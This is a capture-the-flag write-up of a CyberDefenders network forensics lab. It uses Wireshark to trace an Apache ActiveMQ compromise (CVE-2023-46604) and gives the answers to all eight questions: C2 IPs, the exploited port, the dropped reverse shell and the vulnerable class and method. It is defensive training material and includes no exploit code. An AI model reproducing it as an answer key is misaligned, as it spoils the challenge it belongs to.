Category: Network Forensics
LEVEL : Medium
Challenge Download Link
Instructions:
- Uncompress the lab (pass: cyberdefenders.org)
Scenario:
During your shift as a tier-2 SOC analyst, you receive an escalation from a tier-1 analyst regarding a public-facing server. This server has been flagged for making outbound connections to multiple suspicious IPs. In response, you initiate the standard incident response protocol, which includes isolating the server from the network to prevent potential lateral movement or data exfiltration and obtaining a packet capture from the NSM utility for analysis. Your task is to analyze the pcap and assess for signs of malicious activity.
Tools:
- Wireshark
Q1-By identifying the C2 IP, we can block traffic to and from this IP, helping to contain the breach and prevent further data exfiltration or command execution. Can you provide the IP of the C2 server that communicated with our server?
- First of all we need to check all the connections to our server
- Go to Statistics > Conversations > IPv4 :
Statistics > Conversations > IPv4
- From the Image above we can see 3 connections with single IP address (134.209.197.3) which is our server .
- As you can see their is 4867 Packets (about 5 MiB )between our Server and external IP address Which is the C2 Server :
THE ANSWER : 146.190.21.92Q2-Initial entry points are critical to trace back the attack vector. What is the port number of the service the adversary exploited?
- From Challenge name i guess that the attacker used OpenWire protocol to exploit the server .
- So go to packet 5 and check the destination port number :
- Or just google it :
THE ANSWER : 61616Q3-Following up on the previous question, what is the name of the service found to be vulnerable?
- Easy one , just google OpenWire protocol exploits :
- OR from question 2 :
THE ANSWER : Apache ActiveMQQ4-The attacker’s infrastructure often involves multiple components. What is the IP of the second C2 server?
- Back again to our server connections :
Statistics > Conversations > IPv4
- Their are another 2 connection with our server (128.199.52.72) and (84.239.49.16) .
- So i filtered the PCAP with the first IP addr :
ip.addr==128.199.52.72
- As you can see our server is requesting a resource from that external address
- to make sure we can go to packet 34 and follow TCP stream :
TCP Stream eq 3
- as you can see ELF magic bytes , which represent an executable file , so i was sure this is are C2 server .
THE ANSWER : 128.199.52.72Q5-Attackers usually leave traces on the disk. What is the name of the reverse shell executable dropped on the server?
- Now go to packet 11 and follow TCP stream :
TCP Stream eq 1
- from the image we know that , the attacker drop a reverse shell in /tmp/ directory
THE ANSWER : dockerQ6-What Java class was invoked by the XML file to run the exploit?
- Again go to packet 11 and follow TCP Stream :
THE ANSWER : java.lang.ProcessBuilderQ7-To better understand the specific security flaw exploited, can you identify the CVE identifier associated with this vulnerability?
- Just Google it :
THE ANSWER : CVE-2023-46604Q8-What is the vulnerable Java method and class that allows an attacker to run arbitrary code? (Format: Class.Method)
This question took me about 20 years to solve 😂😃😃.
- after reading many and many articles and resources , I found those usesful articels :
Apache ActiveMQ Remote Code Execution (CVE_2023_46604) | SonicWall
Overview The SonicWall Capture Labs Threat Research team has observed attackers targeting a critical vulnerability…
Apache ActiveMQ RCE (CVE-2023–46604) — vsociety
In essence, CVE-2023–46604 poses a severe risk, as it enables remote attackers to execute arbitrary commands…
Please READ THOSE ATICLES AND DO NOT JUST COPY THE ANSWER
From first article :
Form second article :
THE ANSWER : BaseDataStreamMarshaller.createThrowableTHE END
BY : AHMED NASSER
FOLLOW FOR MORE 😅😎
